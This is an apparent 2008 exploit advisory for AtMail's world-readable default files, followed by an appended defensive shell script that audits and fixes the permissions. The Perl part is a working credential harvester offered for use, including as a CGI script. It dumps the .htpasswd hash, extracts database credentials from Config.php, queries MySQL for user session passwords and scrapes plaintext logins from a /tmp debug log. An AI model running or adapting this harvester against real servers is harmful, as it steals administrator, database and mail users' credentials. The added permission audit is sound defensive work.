atmail-disclose.txt

atmail-disclose.txt
Posted Jul 31, 2008
Authored by injusticeinamerica

AtMail leaves world readable files available post install, allowing for the htpasswd file and more to be extracted.

tags | exploit, info disclosure
SHA-256 | 4cdb25f15cb84fcb65b8a8362e83c80708f7391a4778ac56436fdc5a11d8a1b0

#!/usr/bin/perl

################################################################################
#
# LEGAL:
# Permission is granted to freely reproduce this document in its entirety
# under the condition that the contents are not altered in any way.
# milw0rm IS permitted to add their standard footer: // milw0rm.com / date
# Permission to view or reproduce this file is NOT granted to any
# individual with the first name Gadi and the last name Evron, due to the
# prior history of at least 1 individual with this name of making false
# claims that researchers notified them about recently released exploits.
#
# PRODUCT:
# AtMail - atmail.com
#
# VENDOR:
# CalaCode - calacode.com
#
# DOWNLOAD:
# http://atmail.org/download/atmailopen.tgz
# http://atmail.com/demo/atmailphpdemo.tgz
#
# PROBLEM:
# World readable files in the default install lead to sensitive
# information disclosure, loss of integrity.
#
# SOLUTION:
# chmod 640 /path/to/Config.php /path/to/.htpasswd
#
# NOTIFICATION:
# 5/27/2008 - Several emails were sent back and forth, explaining how the
# world readable Config.php issue could be abused. Multiple subsequent
# attempts to obtain a status update from the vendor were unreplied to.
# It's now 07/29/2008. Instead of taking a few moments of their time to
# bring the level of security of the servers this software is installed
# on back up to the same level it was BEFORE this software was installed
# (excluding any other vulnerabilities that may exist in this software),
# the vendor is happily pushing their product at HostingCon at this time.
# (JULY 28-30, 2008).
#
# STATUS:
# Not fixed.
#
# USAGE:
# ./atmail.pl
#
# or simply use it as a CGI script. The vendor claims that ssh access is
# required to abuse this issue. What they really mean is that all someone
# needs is the ability to invoke a few commands from the shell. This is
# easily done in countless ways without requiring authentication via ssh.
#
# +----------------------------------------------------+
# | WEBADMIN USER CREDENTIALS (.htpasswd) |
# +----------------------------------------------------+
# admin:$apr1$L.BPJMnK$sjep5SUN4PG5A.Anw5/Id0
#
# +----------------------------------------------------+
# | DATABASE CREDENTIALS (Config.php) |
# +----------------------------------------------------+
# USER: atmail
# PASS: AF4hubB493
# HOST: localhost
#
# +----------------------------------------------------+
# | CLIENT CREDENTIALS (MySQL) |
# +----------------------------------------------------+
# USER: alice@atmail.com PASS: atmail
# USER: bob@atmail.com PASS: doesn't
# USER: carol@atmail.com PASS: getit
#
# +----------------------------------------------------+
# | MORE CLIENT CREDENTIALS (/tmp/popimap_debug) |
# +----------------------------------------------------+
# USER: alice PASS: atmail
# USER: bob PASS: doesn't
# USER: carol PASS: getit
#
#
# ADDED BONUS: client information persists in the database even after the user
# has logged off.
#
# To make this code work, you must fill in the paths. I don't condone
# malicious use of the information provided in this script, just as I don't
# condone vendor complacency.
#
# If you have found any of this information to be useful to you or someone
# you know, PLEASE consider donating to the Julie Amero Defense Fund:
#
# Official Blog
# http://julieamer.blogspot.com
#
# Trial Transcript
# http://julieamero.blogspot.com
#
# http://google.com/search?q=julie+amero
#
# and/or contacting news outlets, state legislators, the prosecution, etc and
# letting them know your thoughts in a polite and professional manner.
#
################################################################################

# print "Content-type: text/plain\n\n";

use strict;
use warnings;

# The install path comes from the first argument; the file paths below are
# left blank on purpose and must be filled in for the target install.
my $atmail_path          = shift || '';
my $atmail_htpasswd_path = $atmail_path . '';
my $atmail_config_path   = $atmail_path . '';
my $atmail_popimap_debug = '';

my ( $sql_user, $sql_pass, $sql_host );

-e $atmail_path or die "$atmail_path does not exist\n";


###############################################################################
# For logging into https://example.com/atmail/webadmin
###############################################################################
if ( open my $atmail_htpasswd_path_fh, '<', $atmail_htpasswd_path ) {
    print_line();
    print "|\tWEBADMIN USER CREDENTIALS (.htpasswd) |\n";
    print_line();

    # .htpasswd is small; dump it line by line as-is
    while ( <$atmail_htpasswd_path_fh> ) {
        print;
    }

    close $atmail_htpasswd_path_fh;

    print "\n";
}

###############################################################################
# For accessing the atmail db
###############################################################################
if ( open my $atmail_config_fh, '<', $atmail_config_path ) {
    print_line();
    print "|\tDATABASE CREDENTIALS (Config.php) |\n";
    print_line();

    # Pull the three values out of lines such as  'sql_user' => 'atmail',
    while ( <$atmail_config_fh> ) {
        $sql_user = $1 if ( m{ sql_user ' \s => \s ' (.*) ' , }ixms );
        $sql_pass = $1 if ( m{ sql_pass ' \s => \s ' (.*) ' , }ixms );
        $sql_host = $1 if ( m{ sql_host ' \s => \s ' (.*) ' , }ixms );
    }

    close $atmail_config_fh;

    print "USER: $sql_user\nPASS: $sql_pass\nHOST: $sql_host\n";

    print "\n";
}

###############################################################################
# For reading grandma's email
###############################################################################
# Only query the database when all three values were actually found in
# Config.php; otherwise the mysql command line would be built from undef.
if ( defined $sql_user && defined $sql_pass && defined $sql_host ) {
    my $sessions = "mysql -h $sql_host -u $sql_user -p$sql_pass atmail -e 'select * from UserSession \\G'";

    if ( open my $mysql_fh, '-|', $sessions ) {
        print_line();
        print "|\tCLIENT CREDENTIALS (MySQL) |\n";
        print_line();

        # \G output puts one column per line: "Account: ..." then "Password: ..."
        while ( <$mysql_fh> ) {
            if ( m{ Account: \s (\S+) }xms ) {
                print "USER: $1\t";
            }
            elsif ( m{ Password: \s (\S+) }xms ) {
                print "PASS: $1\n";
            }
        }

        close $mysql_fh;

        print "\n";
    }
}

###############################################################################
# Debugging is not enabled by default, and you do have the choice of
# configuring the location of the debug log. The default is /tmp/popimap_debug
# which also presents a symlink attack issue if left to the default setting.
###############################################################################
if ( open my $popimap_debug_fh, '<', '/tmp/popimap_debug' ) {
    my %accounts;

    print_line();
    print "|\tMORE CLIENT CREDENTIALS (/tmp/popimap_debug) |\n";
    print_line();

    # Each client LOGIN is logged verbatim; keep the last password seen per user
    while ( <$popimap_debug_fh> ) {
        if ( m{ \A C: \s ATMAIL00 \s LOGIN \s "(.*)" \s "(.*)" }ixms ) {
            $accounts{$1} = $2;
        }
    }

    close $popimap_debug_fh;

    while ( my ( $user, $pass ) = each %accounts ) {
        print "USER: $user\tPASS: $pass\n";
    }

    print "\n";
}

sub print_line {
    print "+----------------------------------------------------+\n";
}
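The advisory's PROBLEM and SOLUTION sections boil down to two checks an administrator can script: are Config.php and .htpasswd readable by "other", and is the POP/IMAP debug log pointed at a location (the /tmp default) where a symlink attack is possible. The following shell script is an added example and is not part of the advisory or of AtMail; it assumes the two sensitive files sit directly under the install root (the advisory writes them as /path/to/Config.php and /path/to/.htpasswd) and applies the advisory's own chmod 640 as the fix. The debug-log check flags a symlink or a world-writable parent directory, which is the property that makes the /tmp default risky; the sample files and directories it builds under mktemp are constructed for the demo.

```shell
#!/bin/sh
# Added defender-side audit for the AtMail permission issue described above.
# Not part of the original advisory script. Assumptions: Config.php and
# .htpasswd live directly under the install root; the fix is chmod 640.

# Print the octal mode of a path (GNU stat first, BSD/macOS stat as fallback).
perm_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Succeed when the "other" read bit is set (last octal digit has bit 4).
is_world_readable() {
    p=$(perm_of "$1")
    other=${p#"${p%?}"}          # last character of the mode string
    [ $(( other & 4 )) -ne 0 ]
}

# List the sensitive files under ROOT that are world readable, one per line.
# Exit status 1 if any were found, 0 when the install is clean.
audit_install() {
    root=$1
    found=0
    for f in "$root/Config.php" "$root/.htpasswd"; do
        [ -f "$f" ] || continue
        if is_world_readable "$f"; then
            echo "$f"
            found=1
        fi
    done
    return $found
}

# Number of offending files, handy for scripting and assertions.
count_world_readable() {
    audit_install "$1" | wc -l | tr -d ' '
}

# Apply the advisory's fix (chmod 640) to every offending file under ROOT.
harden_install() {
    audit_install "$1" | while read -r f; do
        chmod 640 "$f"
    done
}

# A debug-log location is unsafe if the path is a symlink (the classic
# /tmp symlink attack the advisory mentions) or if its parent directory is
# world writable, so any local user could plant that symlink.
debug_log_is_safe() {
    path=$1
    dir=$(dirname "$path")
    [ -L "$path" ] && return 1
    dmode=$(perm_of "$dir")
    dother=${dmode#"${dmode%?}"}
    [ $(( dother & 2 )) -eq 0 ]
}

# Demo on a constructed throwaway install tree (sample contents are fake).
demo() {
    tmp=$(mktemp -d)
    printf "'sql_pass' => 'example',\n" > "$tmp/Config.php"   # constructed sample
    printf 'admin:$apr1$placeholder\n' > "$tmp/.htpasswd"      # constructed sample
    chmod 644 "$tmp/Config.php" "$tmp/.htpasswd"               # default-install state
    before=$(count_world_readable "$tmp")
    harden_install "$tmp"
    after=$(count_world_readable "$tmp")
    mkdir "$tmp/wtmp" "$tmp/var"
    chmod 1777 "$tmp/wtmp"                                     # like /tmp
    chmod 755 "$tmp/var"
    if debug_log_is_safe "$tmp/wtmp/popimap_debug"; then tmp_ok=yes; else tmp_ok=no; fi
    if debug_log_is_safe "$tmp/var/popimap_debug"; then var_ok=yes; else var_ok=no; fi
    rm -rf "$tmp"
    echo "world-readable before: $before, after: $after; /tmp-style log safe: $tmp_ok, /var-style log safe: $var_ok"
    [ "$before" -eq 2 ] && [ "$after" -eq 0 ] && [ "$tmp_ok" = no ] && [ "$var_ok" = yes ]
}

demo
```

Run it as a cron job or a post-install step against the real install root (replace the demo call with `audit_install /path/to/atmail`); a non-zero exit from audit_install is the signal to alert or to call harden_install. The directory check is deliberately stricter than the advisory's wording: it rejects any world-writable parent, sticky bit or not, because a debug log that is created on first write can still be pre-empted by an existing symlink there.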